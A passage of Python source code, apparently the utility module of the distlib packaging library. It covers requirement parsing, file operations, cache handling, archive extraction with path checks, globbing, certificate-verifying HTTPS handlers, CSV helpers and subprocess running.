('(?P<dn>' + IDENT + r')\s*(' + EXTRAS + r'\s*)?(\s*' + CONSTRAINTS + ')?$') REQUIREMENT_RE = re.compile(REQUIREMENT) # # Used to scan through the constraints # RELOP_IDENT = '(?P<op>' + RELOP + r')\s*(?P<vn>' + VERSPEC + ')' RELOP_IDENT_RE = re.compile(RELOP_IDENT) def parse_requirement(s): def get_constraint(m): d = m.groupdict() return d['op'], d['vn'] result = None m = REQUIREMENT_RE.match(s) if m: d = m.groupdict() name = d['dn'] cons = d['c1'] or d['c2'] if not d['diref']: url = None else: # direct reference cons = None url = d['diref'].strip() if not cons: cons = None constr = '' rs = d['dn'] else: if cons[0] not in '<>!=': cons = '~=' + cons iterator = RELOP_IDENT_RE.finditer(cons) cons = [get_constraint(m) for m in iterator] rs = '%s (%s)' % (name, ', '.join(['%s %s' % con for con in cons])) if not d['ex']: extras = None else: extras = COMMA_RE.split(d['ex']) result = Container(name=name, constraints=cons, extras=extras, requirement=rs, source=s, url=url) return result def get_resources_dests(resources_root, rules): """Find destinations for resources files""" def get_rel_path(base, path): # normalizes and returns a lstripped-/-separated path base = base.replace(os.path.sep, '/') path = path.replace(os.path.sep, '/') assert path.startswith(base) return path[len(base):].lstrip('/') destinations = {} for base, suffix, dest in rules: prefix = os.path.join(resources_root, base) for abs_base in iglob(prefix): abs_glob = os.path.join(abs_base, suffix) for abs_path in iglob(abs_glob): resource_file = get_rel_path(resources_root, abs_path) if dest is None: # remove the entry if it was here destinations.pop(resource_file, None) else: rel_path = get_rel_path(abs_base, abs_path) rel_dest = dest.replace(os.path.sep, '/').rstrip('/') destinations[resource_file] = rel_dest + '/' + rel_path return destinations def in_venv(): if hasattr(sys, 'real_prefix'): # virtualenv venvs result = True else: # PEP 405 venvs result = sys.prefix != getattr(sys, 'base_prefix', sys.prefix) return result def get_executable(): if sys.platform == 'darwin' and ('__PYVENV_LAUNCHER__' in os.environ): result = os.environ['__PYVENV_LAUNCHER__'] else: result = sys.executable return result def proceed(prompt, allowed_chars, error_prompt=None, default=None): p = prompt while True: s = raw_input(p) p = prompt if not s and default: s = default if s: c = s[0].lower() if c in allowed_chars: break if error_prompt: p = '%c: %s\n%s' % (c, error_prompt, prompt) return c def extract_by_key(d, keys): if isinstance(keys, string_types): keys = keys.split() result = {} for key in keys: if key in d: result[key] = d[key] return result def read_exports(stream): if sys.version_info[0] >= 3: # needs to be a text stream stream = codecs.getreader('utf-8')(stream) # Try to load as JSON, falling back on legacy format data = stream.read() stream = StringIO(data) try: data = json.load(stream) result = data['exports'] for group, entries in result.items(): for k, v in entries.items(): s = '%s = %s' % (k, v) entry = get_export_entry(s) assert entry is not None entries[k] = entry return result except Exception: stream.seek(0, 0) cp = configparser.ConfigParser() if hasattr(cp, 'read_file'): cp.read_file(stream) else: cp.readfp(stream) result = {} for key in cp.sections(): result[key] = entries = {} for name, value in cp.items(key): s = '%s = %s' % (name, value) entry = get_export_entry(s) assert entry is not None # entry.dist = self entries[name] = entry return result def write_exports(exports, stream): if sys.version_info[0] >= 3: # needs to be a text stream stream = codecs.getwriter('utf-8')(stream) cp = configparser.ConfigParser() for k, v in exports.items(): # TODO check k, v for valid values cp.add_section(k) for entry in v.values(): if entry.suffix is None: s = entry.prefix else: s = '%s:%s' % (entry.prefix, entry.suffix) if entry.flags: s = '%s [%s]' % (s, ', '.join(entry.flags)) cp.set(k, entry.name, s) cp.write(stream) @contextlib.contextmanager def tempdir(): td = tempfile.mkdtemp() try: yield td finally: shutil.rmtree(td) @contextlib.contextmanager def chdir(d): cwd = os.getcwd() try: os.chdir(d) yield finally: os.chdir(cwd) @contextlib.contextmanager def socket_timeout(seconds=15): cto = socket.getdefaulttimeout() try: socket.setdefaulttimeout(seconds) yield finally: socket.setdefaulttimeout(cto) class cached_property(object): def __init__(self, func): self.func = func # for attr in ('__name__', '__module__', '__doc__'): # setattr(self, attr, getattr(func, attr, None)) def __get__(self, obj, cls=None): if obj is None: return self value = self.func(obj) object.__setattr__(obj, self.func.__name__, value) # obj.__dict__[self.func.__name__] = value = self.func(obj) return value def convert_path(pathname): """Return 'pathname' as a name that will work on the native filesystem. The path is split on '/' and put back together again using the current directory separator. Needed because filenames in the setup script are always supplied in Unix style, and have to be converted to the local convention before we can actually use them in the filesystem. Raises ValueError on non-Unix-ish systems if 'pathname' either starts or ends with a slash. """ if os.sep == '/': return pathname if not pathname: return pathname if pathname[0] == '/': raise ValueError("path '%s' cannot be absolute" % pathname) if pathname[-1] == '/': raise ValueError("path '%s' cannot end with '/'" % pathname) paths = pathname.split('/') while os.curdir in paths: paths.remove(os.curdir) if not paths: return os.curdir return os.path.join(*paths) class FileOperator(object): def __init__(self, dry_run=False): self.dry_run = dry_run self.ensured = set() self._init_record() def _init_record(self): self.record = False self.files_written = set() self.dirs_created = set() def record_as_written(self, path): if self.record: self.files_written.add(path) def newer(self, source, target): """Tell if the target is newer than the source. Returns true if 'source' exists and is more recently modified than 'target', or if 'source' exists and 'target' doesn't. Returns false if both exist and 'target' is the same age or younger than 'source'. Raise PackagingFileError if 'source' does not exist. Note that this test is not very accurate: files created in the same second will have the same "age". """ if not os.path.exists(source): raise DistlibException("file '%r' does not exist" % os.path.abspath(source)) if not os.path.exists(target): return True return os.stat(source).st_mtime > os.stat(target).st_mtime def copy_file(self, infile, outfile, check=True): """Copy a file respecting dry-run and force flags. """ self.ensure_dir(os.path.dirname(outfile)) logger.info('Copying %s to %s', infile, outfile) if not self.dry_run: msg = None if check: if os.path.islink(outfile): msg = '%s is a symlink' % outfile elif os.path.exists(outfile) and not os.path.isfile(outfile): msg = '%s is a non-regular file' % outfile if msg: raise ValueError(msg + ' which would be overwritten') shutil.copyfile(infile, outfile) self.record_as_written(outfile) def copy_stream(self, instream, outfile, encoding=None): assert not os.path.isdir(outfile) self.ensure_dir(os.path.dirname(outfile)) logger.info('Copying stream %s to %s', instream, outfile) if not self.dry_run: if encoding is None: outstream = open(outfile, 'wb') else: outstream = codecs.open(outfile, 'w', encoding=encoding) try: shutil.copyfileobj(instream, outstream) finally: outstream.close() self.record_as_written(outfile) def write_binary_file(self, path, data): self.ensure_dir(os.path.dirname(path)) if not self.dry_run: with open(path, 'wb') as f: f.write(data) self.record_as_written(path) def write_text_file(self, path, data, encoding): self.ensure_dir(os.path.dirname(path)) if not self.dry_run: with open(path, 'wb') as f: f.write(data.encode(encoding)) self.record_as_written(path) def set_mode(self, bits, mask, files): if os.name == 'posix': # Set the executable bits (owner, group, and world) on # all the files specified. for f in files: if self.dry_run: logger.info("changing mode of %s", f) else: mode = (os.stat(f).st_mode | bits) & mask logger.info("changing mode of %s to %o", f, mode) os.chmod(f, mode) set_executable_mode = lambda s, f: s.set_mode(0o555, 0o7777, f) def ensure_dir(self, path): path = os.path.abspath(path) if path not in self.ensured and not os.path.exists(path): self.ensured.add(path) d, f = os.path.split(path) self.ensure_dir(d) logger.info('Creating %s' % path) if not self.dry_run: os.mkdir(path) if self.record: self.dirs_created.add(path) def byte_compile(self, path, optimize=False, force=False, prefix=None): dpath = cache_from_source(path, not optimize) logger.info('Byte-compiling %s to %s', path, dpath) if not self.dry_run: if force or self.newer(path, dpath): if not prefix: diagpath = None else: assert path.startswith(prefix) diagpath = path[len(prefix):] py_compile.compile(path, dpath, diagpath, True) # raise error self.record_as_written(dpath) return dpath def ensure_removed(self, path): if os.path.exists(path): if os.path.isdir(path) and not os.path.islink(path): logger.debug('Removing directory tree at %s', path) if not self.dry_run: shutil.rmtree(path) if self.record: if path in self.dirs_created: self.dirs_created.remove(path) else: if os.path.islink(path): s = 'link' else: s = 'file' logger.debug('Removing %s %s', s, path) if not self.dry_run: os.remove(path) if self.record: if path in self.files_written: self.files_written.remove(path) def is_writable(self, path): result = False while not result: if os.path.exists(path): result = os.access(path, os.W_OK) break parent = os.path.dirname(path) if parent == path: break path = parent return result def commit(self): """ Commit recorded changes, turn off recording, return changes. """ assert self.record result = self.files_written, self.dirs_created self._init_record() return result def rollback(self): if not self.dry_run: for f in list(self.files_written): if os.path.exists(f): os.remove(f) # dirs should all be empty now, except perhaps for # __pycache__ subdirs # reverse so that subdirs appear before their parents dirs = sorted(self.dirs_created, reverse=True) for d in dirs: flist = os.listdir(d) if flist: assert flist == ['__pycache__'] sd = os.path.join(d, flist[0]) os.rmdir(sd) os.rmdir(d) # should fail if non-empty self._init_record() def resolve(module_name, dotted_path): if module_name in sys.modules: mod = sys.modules[module_name] else: mod = __import__(module_name) if dotted_path is None: result = mod else: parts = dotted_path.split('.') result = getattr(mod, parts.pop(0)) for p in parts: result = getattr(result, p) return result class ExportEntry(object): def __init__(self, name, prefix, suffix, flags): self.name = name self.prefix = prefix self.suffix = suffix self.flags = flags @cached_property def value(self): return resolve(self.prefix, self.suffix) def __repr__(self): return '<ExportEntry %s = %s:%s %s>' % (self.name, self.prefix, self.suffix, self.flags) def __eq__(self, other): if not isinstance(other, ExportEntry): result = False else: result = (self.name == other.name and self.prefix == other.prefix and self.suffix == other.suffix and self.flags == other.flags) return result __hash__ = object.__hash__ ENTRY_RE = re.compile(r'''(?P<name>(\w|[-.])+) \s*=\s*(?P<callable>(\w+)([:\.]\w+)*) \s*(\[\s*(?P<flags>\w+(=\w+)?(,\s*\w+(=\w+)?)*)\s*\])? ''', re.VERBOSE) def get_export_entry(specification): m = ENTRY_RE.search(specification) if not m: result = None if '[' in specification or ']' in specification: raise DistlibException('Invalid specification ' '%r' % specification) else: d = m.groupdict() name = d['name'] path = d['callable'] colons = path.count(':') if colons == 0: prefix, suffix = path, None else: if colons != 1: raise DistlibException('Invalid specification ' '%r' % specification) prefix, suffix = path.split(':') flags = d['flags'] if flags is None: if '[' in specification or ']' in specification: raise DistlibException('Invalid specification ' '%r' % specification) flags = [] else: flags = [f.strip() for f in flags.split(',')] result = ExportEntry(name, prefix, suffix, flags) return result def get_cache_base(suffix=None): """ Return the default base location for distlib caches. If the directory does not exist, it is created. Use the suffix provided for the base directory, and default to '.distlib' if it isn't provided. On Windows, if LOCALAPPDATA is defined in the environment, then it is assumed to be a directory, and will be the parent directory of the result. On POSIX, and on Windows if LOCALAPPDATA is not defined, the user's home directory - using os.expanduser('~') - will be the parent directory of the result. The result is just the directory '.distlib' in the parent directory as determined above, or with the name specified with ``suffix``. """ if suffix is None: suffix = '.distlib' if os.name == 'nt' and 'LOCALAPPDATA' in os.environ: result = os.path.expandvars('$localappdata') else: # Assume posix, or old Windows result = os.path.expanduser('~') # we use 'isdir' instead of 'exists', because we want to # fail if there's a file with that name if os.path.isdir(result): usable = os.access(result, os.W_OK) if not usable: logger.warning('Directory exists but is not writable: %s', result) else: try: os.makedirs(result) usable = True except OSError: logger.warning('Unable to create %s', result, exc_info=True) usable = False if not usable: result = tempfile.mkdtemp() logger.warning('Default location unusable, using %s', result) return os.path.join(result, suffix) def path_to_cache_dir(path): """ Convert an absolute path to a directory name for use in a cache. The algorithm used is: #. On Windows, any ``':'`` in the drive is replaced with ``'---'``. #. Any occurrence of ``os.sep`` is replaced with ``'--'``. #. ``'.cache'`` is appended. """ d, p = os.path.splitdrive(os.path.abspath(path)) if d: d = d.replace(':', '---') p = p.replace(os.sep, '--') return d + p + '.cache' def ensure_slash(s): if not s.endswith('/'): return s + '/' return s def parse_credentials(netloc): username = password = None if '@' in netloc: prefix, netloc = netloc.split('@', 1) if ':' not in prefix: username = prefix else: username, password = prefix.split(':', 1) return username, password, netloc def get_process_umask(): result = os.umask(0o22) os.umask(result) return result def is_string_sequence(seq): result = True i = None for i, s in enumerate(seq): if not isinstance(s, string_types): result = False break assert i is not None return result PROJECT_NAME_AND_VERSION = re.compile('([a-z0-9_]+([.-][a-z_][a-z0-9_]*)*)-' '([a-z0-9_.+-]+)', re.I) PYTHON_VERSION = re.compile(r'-py(\d\.?\d?)') def split_filename(filename, project_name=None): """ Extract name, version, python version from a filename (no extension) Return name, version, pyver or None """ result = None pyver = None m = PYTHON_VERSION.search(filename) if m: pyver = m.group(1) filename = filename[:m.start()] if project_name and len(filename) > len(project_name) + 1: m = re.match(re.escape(project_name) + r'\b', filename) if m: n = m.end() result = filename[:n], filename[n + 1:], pyver if result is None: m = PROJECT_NAME_AND_VERSION.match(filename) if m: result = m.group(1), m.group(3), pyver return result # Allow spaces in name because of legacy dists like "Twisted Core" NAME_VERSION_RE = re.compile(r'(?P<name>[\w .-]+)\s*' r'\(\s*(?P<ver>[^\s)]+)\)$') def parse_name_and_version(p): """ A utility method used to get name and version from a string. From e.g. a Provides-Dist value. :param p: A value in a form 'foo (1.0)' :return: The name and version as a tuple. """ m = NAME_VERSION_RE.match(p) if not m: raise DistlibException('Ill-formed name/version string: \'%s\'' % p) d = m.groupdict() return d['name'].strip().lower(), d['ver'] def get_extras(requested, available): result = set() requested = set(requested or []) available = set(available or []) if '*' in requested: requested.remove('*') result |= available for r in requested: if r == '-': result.add(r) elif r.startswith('-'): unwanted = r[1:] if unwanted not in available: logger.warning('undeclared extra: %s' % unwanted) if unwanted in result: result.remove(unwanted) else: if r not in available: logger.warning('undeclared extra: %s' % r) result.add(r) return result # # Extended metadata functionality # def _get_external_data(url): result = {} try: # urlopen might fail if it runs into redirections, # because of Python issue #13696. Fixed in locators # using a custom redirect handler. resp = urlopen(url) headers = resp.info() if headers.get('Content-Type') != 'application/json': logger.debug('Unexpected response for JSON request') else: reader = codecs.getreader('utf-8')(resp) # data = reader.read().decode('utf-8') #result = json.loads(data) result = json.load(reader) except Exception as e: logger.exception('Failed to get external data for %s: %s', url, e) return result def get_project_data(name): url = ('https://www.red-dove.com/pypi/projects/' '%s/%s/project.json' % (name[0].upper(), name)) result = _get_external_data(url) return result def get_package_data(name, version): url = ('https://www.red-dove.com/pypi/projects/' '%s/%s/package-%s.json' % (name[0].upper(), name, version)) return _get_external_data(url) class Cache(object): """ A class implementing a cache for resources that need to live in the file system e.g. shared libraries. This class was moved from resources to here because it could be used by other modules, e.g. the wheel module. """ def __init__(self, base): """ Initialise an instance. :param base: The base directory where the cache should be located. """ # we use 'isdir' instead of 'exists', because we want to # fail if there's a file with that name if not os.path.isdir(base): os.makedirs(base) if (os.stat(base).st_mode & 0o77) != 0: logger.warning('Directory \'%s\' is not private', base) self.base = os.path.abspath(os.path.normpath(base)) def prefix_to_dir(self, prefix): """ Converts a resource prefix to a directory name in the cache. """ return path_to_cache_dir(prefix) def clear(self): """ Clear the cache. """ not_removed = [] for fn in os.listdir(self.base): fn = os.path.join(self.base, fn) try: if os.path.islink(fn) or os.path.isfile(fn): os.remove(fn) elif os.path.isdir(fn): shutil.rmtree(fn) except Exception: not_removed.append(fn) return not_removed class EventMixin(object): """ A very simple publish/subscribe system. """ def __init__(self): self._subscribers = {} def add(self, event, subscriber, append=True): """ Add a subscriber for an event. :param event: The name of an event. :param subscriber: The subscriber to be added (and called when the event is published). :param append: Whether to append or prepend the subscriber to an existing subscriber list for the event. """ subs = self._subscribers if event not in subs: subs[event] = deque([subscriber]) else: sq = subs[event] if append: sq.append(subscriber) else: sq.appendleft(subscriber) def remove(self, event, subscriber): """ Remove a subscriber for an event. :param event: The name of an event. :param subscriber: The subscriber to be removed. """ subs = self._subscribers if event not in subs: raise ValueError('No subscribers: %r' % event) subs[event].remove(subscriber) def get_subscribers(self, event): """ Return an iterator for the subscribers for an event. :param event: The event to return subscribers for. """ return iter(self._subscribers.get(event, ())) def publish(self, event, *args, **kwargs): """ Publish a event and return a list of values returned by its subscribers. :param event: The event to publish. :param args: The positional arguments to pass to the event's subscribers. :param kwargs: The keyword arguments to pass to the event's subscribers. """ result = [] for subscriber in self.get_subscribers(event): try: value = subscriber(event, *args, **kwargs) except Exception: logger.exception('Exception during event publication') value = None result.append(value) logger.debug('publish %s: args = %s, kwargs = %s, result = %s', event, args, kwargs, result) return result # # Simple sequencing # class Sequencer(object): def __init__(self): self._preds = {} self._succs = {} self._nodes = set() # nodes with no preds/succs def add_node(self, node): self._nodes.add(node) def remove_node(self, node, edges=False): if node in self._nodes: self._nodes.remove(node) if edges: for p in set(self._preds.get(node, ())): self.remove(p, node) for s in set(self._succs.get(node, ())): self.remove(node, s) # Remove empties for k, v in list(self._preds.items()): if not v: del self._preds[k] for k, v in list(self._succs.items()): if not v: del self._succs[k] def add(self, pred, succ): assert pred != succ self._preds.setdefault(succ, set()).add(pred) self._succs.setdefault(pred, set()).add(succ) def remove(self, pred, succ): assert pred != succ try: preds = self._preds[succ] succs = self._succs[pred] except KeyError: raise ValueError('%r not a successor of anything' % succ) try: preds.remove(pred) succs.remove(succ) except KeyError: raise ValueError('%r not a successor of %r' % (succ, pred)) def is_step(self, step): return (step in self._preds or step in self._succs or step in self._nodes) def get_steps(self, final): if not self.is_step(final): raise ValueError('Unknown: %r' % final) result = [] todo = [] seen = set() todo.append(final) while todo: step = todo.pop(0) if step in seen: # if a step was already seen, # move it to the end (so it will appear earlier # when reversed on return) ... but not for the # final step, as that would be confusing for # users if step != final: result.remove(step) result.append(step) else: seen.add(step) result.append(step) preds = self._preds.get(step, ()) todo.extend(preds) return reversed(result) @property def strong_connections(self): # http://en.wikipedia.org/wiki/Tarjan%27s_strongly_connected_components_algorithm index_counter = [0] stack = [] lowlinks = {} index = {} result = [] graph = self._succs def strongconnect(node): # set the depth index for this node to the smallest unused index index[node] = index_counter[0] lowlinks[node] = index_counter[0] index_counter[0] += 1 stack.append(node) # Consider successors try: successors = graph[node] except Exception: successors = [] for successor in successors: if successor not in lowlinks: # Successor has not yet been visited strongconnect(successor) lowlinks[node] = min(lowlinks[node], lowlinks[successor]) elif successor in stack: # the successor is in the stack and hence in the current # strongly connected component (SCC) lowlinks[node] = min(lowlinks[node], index[successor]) # If `node` is a root node, pop the stack and generate an SCC if lowlinks[node] == index[node]: connected_component = [] while True: successor = stack.pop() connected_component.append(successor) if successor == node: break component = tuple(connected_component) # storing the result result.append(component) for node in graph: if node not in lowlinks: strongconnect(node) return result @property def dot(self): result = ['digraph G {'] for succ in self._preds: preds = self._preds[succ] for pred in preds: result.append(' %s -> %s;' % (pred, succ)) for node in self._nodes: result.append(' %s;' % node) result.append('}') return '\n'.join(result) # # Unarchiving functionality for zip, tar, tgz, tbz, whl # ARCHIVE_EXTENSIONS = ('.tar.gz', '.tar.bz2', '.tar', '.zip', '.tgz', '.tbz', '.whl') def unarchive(archive_filename, dest_dir, format=None, check=True): def check_path(path): if not isinstance(path, text_type): path = path.decode('utf-8') p = os.path.abspath(os.path.join(dest_dir, path)) if not p.startswith(dest_dir) or p[plen] != os.sep: raise ValueError('path outside destination: %r' % p) dest_dir = os.path.abspath(dest_dir) plen = len(dest_dir) archive = None if format is None: if archive_filename.endswith(('.zip', '.whl')): format = 'zip' elif archive_filename.endswith(('.tar.gz', '.tgz')): format = 'tgz' mode = 'r:gz' elif archive_filename.endswith(('.tar.bz2', '.tbz')): format = 'tbz' mode = 'r:bz2' elif archive_filename.endswith('.tar'): format = 'tar' mode = 'r' else: raise ValueError('Unknown format for %r' % archive_filename) try: if format == 'zip': archive = ZipFile(archive_filename, 'r') if check: names = archive.namelist() for name in names: check_path(name) else: archive = tarfile.open(archive_filename, mode) if check: names = archive.getnames() for name in names: check_path(name) if format != 'zip' and sys.version_info[0] < 3: # See Python issue 17153. If the dest path contains Unicode, # tarfile extraction fails on Python 2.x if a member path name # contains non-ASCII characters - it leads to an implicit # bytes -> unicode conversion using ASCII to decode. for tarinfo in archive.getmembers(): if not isinstance(tarinfo.name, text_type): tarinfo.name = tarinfo.name.decode('utf-8') archive.extractall(dest_dir) finally: if archive: archive.close() def zip_dir(directory): """zip a directory tree into a BytesIO object""" result = io.BytesIO() dlen = len(directory) with ZipFile(result, "w") as zf: for root, dirs, files in os.walk(directory): for name in files: full = os.path.join(root, name) rel = root[dlen:] dest = os.path.join(rel, name) zf.write(full, dest) return result # # Simple progress bar # UNITS = ('', 'K', 'M', 'G', 'T', 'P') class Progress(object): unknown = 'UNKNOWN' def __init__(self, minval=0, maxval=100): assert maxval is None or maxval >= minval self.min = self.cur = minval self.max = maxval self.started = None self.elapsed = 0 self.done = False def update(self, curval): assert self.min <= curval assert self.max is None or curval <= self.max self.cur = curval now = time.time() if self.started is None: self.started = now else: self.elapsed = now - self.started def increment(self, incr): assert incr >= 0 self.update(self.cur + incr) def start(self): self.update(self.min) return self def stop(self): if self.max is not None: self.update(self.max) self.done = True @property def maximum(self): return self.unknown if self.max is None else self.max @property def percentage(self): if self.done: result = '100 %' elif self.max is None: result = ' ?? %' else: v = 100.0 * (self.cur - self.min) / (self.max - self.min) result = '%3d %%' % v return result def format_duration(self, duration): if (duration <= 0) and self.max is None or self.cur == self.min: result = '??:??:??' # elif duration < 1: # result = '--:--:--' else: result = time.strftime('%H:%M:%S', time.gmtime(duration)) return result @property def ETA(self): if self.done: prefix = 'Done' t = self.elapsed # import pdb; pdb.set_trace() else: prefix = 'ETA ' if self.max is None: t = -1 elif self.elapsed == 0 or (self.cur == self.min): t = 0 else: # import pdb; pdb.set_trace() t = float(self.max - self.min) t /= self.cur - self.min t = (t - 1) * self.elapsed return '%s: %s' % (prefix, self.format_duration(t)) @property def speed(self): if self.elapsed == 0: result = 0.0 else: result = (self.cur - self.min) / self.elapsed for unit in UNITS: if result < 1000: break result /= 1000.0 return '%d %sB/s' % (result, unit) # # Glob functionality # RICH_GLOB = re.compile(r'\{([^}]*)\}') _CHECK_RECURSIVE_GLOB = re.compile(r'[^/\\,{]\*\*|\*\*[^/\\,}]') _CHECK_MISMATCH_SET = re.compile(r'^[^{]*\}|\{[^}]*$') def iglob(path_glob): """Extended globbing function that supports ** and {opt1,opt2,opt3}.""" if _CHECK_RECURSIVE_GLOB.search(path_glob): msg = """invalid glob %r: recursive glob "**" must be used alone""" raise ValueError(msg % path_glob) if _CHECK_MISMATCH_SET.search(path_glob): msg = """invalid glob %r: mismatching set marker '{' or '}'""" raise ValueError(msg % path_glob) return _iglob(path_glob) def _iglob(path_glob): rich_path_glob = RICH_GLOB.split(path_glob, 1) if len(rich_path_glob) > 1: assert len(rich_path_glob) == 3, rich_path_glob prefix, set, suffix = rich_path_glob for item in set.split(','): for path in _iglob(''.join((prefix, item, suffix))): yield path else: if '**' not in path_glob: for item in std_iglob(path_glob): yield item else: prefix, radical = path_glob.split('**', 1) if prefix == '': prefix = '.' if radical == '': radical = '*' else: # we support both radical = radical.lstrip('/') radical = radical.lstrip('\\') for path, dir, files in os.walk(prefix): path = os.path.normpath(path) for fn in _iglob(os.path.join(path, radical)): yield fn # # HTTPSConnection which verifies certificates/matches domains # class HTTPSConnection(httplib.HTTPSConnection): ca_certs = None # set this to the path to the certs file (.pem) check_domain = True # only used if ca_certs is not None # noinspection PyPropertyAccess def connect(self): sock = socket.create_connection((self.host, self.port), self.timeout) if getattr(self, '_tunnel_host', False): self.sock = sock self._tunnel() if not hasattr(ssl, 'SSLContext'): # For 2.x if self.ca_certs: cert_reqs = ssl.CERT_REQUIRED else: cert_reqs = ssl.CERT_NONE self.sock = ssl.wrap_socket(sock, self.key_file, self.cert_file, cert_reqs=cert_reqs, ssl_version=ssl.PROTOCOL_SSLv23, ca_certs=self.ca_certs) else: context = ssl.SSLContext(ssl.PROTOCOL_SSLv23) context.options |= ssl.OP_NO_SSLv2 if self.cert_file: context.load_cert_chain(self.cert_file, self.key_file) kwargs = {} if self.ca_certs: context.verify_mode = ssl.CERT_REQUIRED context.load_verify_locations(cafile=self.ca_certs) if getattr(ssl, 'HAS_SNI', False): kwargs['server_hostname'] = self.host self.sock = context.wrap_socket(sock, **kwargs) if self.ca_certs and self.check_domain: try: match_hostname(self.sock.getpeercert(), self.host) logger.debug('Host verified: %s', self.host) except CertificateError: self.sock.shutdown(socket.SHUT_RDWR) self.sock.close() raise class HTTPSHandler(BaseHTTPSHandler): def __init__(self, ca_certs, check_domain=True): BaseHTTPSHandler.__init__(self) self.ca_certs = ca_certs self.check_domain = check_domain def _conn_maker(self, *args, **kwargs): """ This is called to create a connection instance. Normally you'd pass a connection class to do_open, but it doesn't actually check for a class, and just expects a callable. As long as we behave just as a constructor would have, we should be OK. If it ever changes so that we *must* pass a class, we'll create an UnsafeHTTPSConnection class which just sets check_domain to False in the class definition, and choose which one to pass to do_open. """ result = HTTPSConnection(*args, **kwargs) if self.ca_certs: result.ca_certs = self.ca_certs result.check_domain = self.check_domain return result def https_open(self, req): try: return self.do_open(self._conn_maker, req) except URLError as e: if 'certificate verify failed' in str(e.reason): raise CertificateError('Unable to verify server certificate ' 'for %s' % req.host) else: raise # # To prevent against mixing HTTP traffic with HTTPS (examples: A Man-In-The- # Middle proxy using HTTP listens on port 443, or an index mistakenly serves # HTML containing a http://xyz link when it should be https://xyz), # you can use the following handler class, which does not allow HTTP traffic. # # It works by inheriting from HTTPHandler - so build_opener won't add a # handler for HTTP itself. # class HTTPSOnlyHandler(HTTPSHandler, HTTPHandler): def http_open(self, req): raise URLError('Unexpected HTTP request on what should be a secure ' 'connection: %s' % req) # # XML-RPC with timeouts # _ver_info = sys.version_info[:2] if _ver_info == (2, 6): class HTTP(httplib.HTTP): def __init__(self, host='', port=None, **kwargs): if port == 0: # 0 means use port 0, not the default port port = None self._setup(self._connection_class(host, port, **kwargs)) class HTTPS(httplib.HTTPS): def __init__(self, host='', port=None, **kwargs): if port == 0: # 0 means use port 0, not the default port port = None self._setup(self._connection_class(host, port, **kwargs)) class Transport(xmlrpclib.Transport): def __init__(self, timeout, use_datetime=0): self.timeout = timeout xmlrpclib.Transport.__init__(self, use_datetime) def make_connection(self, host): h, eh, x509 = self.get_host_info(host) if _ver_info == (2, 6): result = HTTP(h, timeout=self.timeout) else: if not self._connection or host != self._connection[0]: self._extra_headers = eh self._connection = host, httplib.HTTPConnection(h) result = self._connection[1] return result class SafeTransport(xmlrpclib.SafeTransport): def __init__(self, timeout, use_datetime=0): self.timeout = timeout xmlrpclib.SafeTransport.__init__(self, use_datetime) def make_connection(self, host): h, eh, kwargs = self.get_host_info(host) if not kwargs: kwargs = {} kwargs['timeout'] = self.timeout if _ver_info == (2, 6): result = HTTPS(host, None, **kwargs) else: if not self._connection or host != self._connection[0]: self._extra_headers = eh self._connection = host, httplib.HTTPSConnection(h, None, **kwargs) result = self._connection[1] return result class ServerProxy(xmlrpclib.ServerProxy): def __init__(self, uri, **kwargs): self.timeout = timeout = kwargs.pop('timeout', None) # The above classes only come into play if a timeout # is specified if timeout is not None: scheme, _ = splittype(uri) use_datetime = kwargs.get('use_datetime', 0) if scheme == 'https': tcls = SafeTransport else: tcls = Transport kwargs['transport'] = t = tcls(timeout, use_datetime=use_datetime) self.transport = t xmlrpclib.ServerProxy.__init__(self, uri, **kwargs) # # CSV functionality. This is provided because on 2.x, the csv module can't # handle Unicode. However, we need to deal with Unicode in e.g. RECORD files. # def _csv_open(fn, mode, **kwargs): if sys.version_info[0] < 3: mode += 'b' else: kwargs['newline'] = '' return open(fn, mode, **kwargs) class CSVBase(object): defaults = { 'delimiter': str(','), # The strs are used because we need native 'quotechar': str('"'), # str in the csv API (2.x won't take 'lineterminator': str('\n') # Unicode) } def __enter__(self): return self def __exit__(self, *exc_info): self.stream.close() class CSVReader(CSVBase): def __init__(self, **kwargs): if 'stream' in kwargs: stream = kwargs['stream'] if sys.version_info[0] >= 3: # needs to be a text stream stream = codecs.getreader('utf-8')(stream) self.stream = stream else: self.stream = _csv_open(kwargs['path'], 'r') self.reader = csv.reader(self.stream, **self.defaults) def __iter__(self): return self def next(self): result = next(self.reader) if sys.version_info[0] < 3: for i, item in enumerate(result): if not isinstance(item, text_type): result[i] = item.decode('utf-8') return result __next__ = next class CSVWriter(CSVBase): def __init__(self, fn, **kwargs): self.stream = _csv_open(fn, 'w') self.writer = csv.writer(self.stream, **self.defaults) def writerow(self, row): if sys.version_info[0] < 3: r = [] for item in row: if isinstance(item, text_type): item = item.encode('utf-8') r.append(item) row = r self.writer.writerow(row) # # Configurator functionality # class Configurator(BaseConfigurator): value_converters = dict(BaseConfigurator.value_converters) value_converters['inc'] = 'inc_convert' def __init__(self, config, base=None): super(Configurator, self).__init__(config) self.base = base or os.getcwd() def configure_custom(self, config): def convert(o): if isinstance(o, (list, tuple)): result = type(o)([convert(i) for i in o]) elif isinstance(o, dict): if '()' in o: result = self.configure_custom(o) else: result = {} for k in o: result[k] = convert(o[k]) else: result = self.convert(o) return result c = config.pop('()') if not callable(c): c = self.resolve(c) props = config.pop('.', None) # Check for valid identifiers args = config.pop('[]', ()) if args: args = tuple([convert(o) for o in args]) items = [(k, convert(config[k])) for k in config if valid_ident(k)] kwargs = dict(items) result = c(*args, **kwargs) if props: for n, v in props.items(): setattr(result, n, convert(v)) return result def __getitem__(self, key): result = self.config[key] if isinstance(result, dict) and '()' in result: self.config[key] = result = self.configure_custom(result) return result def inc_convert(self, value): """Default converter for the inc:// protocol.""" if not os.path.isabs(value): value = os.path.join(self.base, value) with codecs.open(value, 'r', encoding='utf-8') as f: result = json.load(f) return result # # Mixin for running subprocesses and capturing their output # class SubprocessMixin(object): def __init__(self, verbose=False, progress=None): self.verbose = verbose self.progress = progress def reader(self, stream, context): """ Read lines from a subprocess' output stream and either pass to a progress callable (if specified) or write progress information to sys.stderr. """ progress = self.progress verbose = self.verbose while True: s = stream.readline() if not s: break if progress is not None: progress(s, context) else: if not verbose: sys.stderr.write('.') else: sys.stderr.write(s.decode('utf-8')) sys.stderr.flush() stream.close() def run_command(self, cmd, **kwargs): p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, **kwargs) t1 = threading.Thread(target=self.reader, args=(p.stdout, 'stdout')) t1.start() t2 = threading.Thread(target=self.reader, args=(p.stderr, 'stderr')) t2.start() p.wait() t1.join() t2.join() if self.progress is not None: self.progress('done.', 'main') 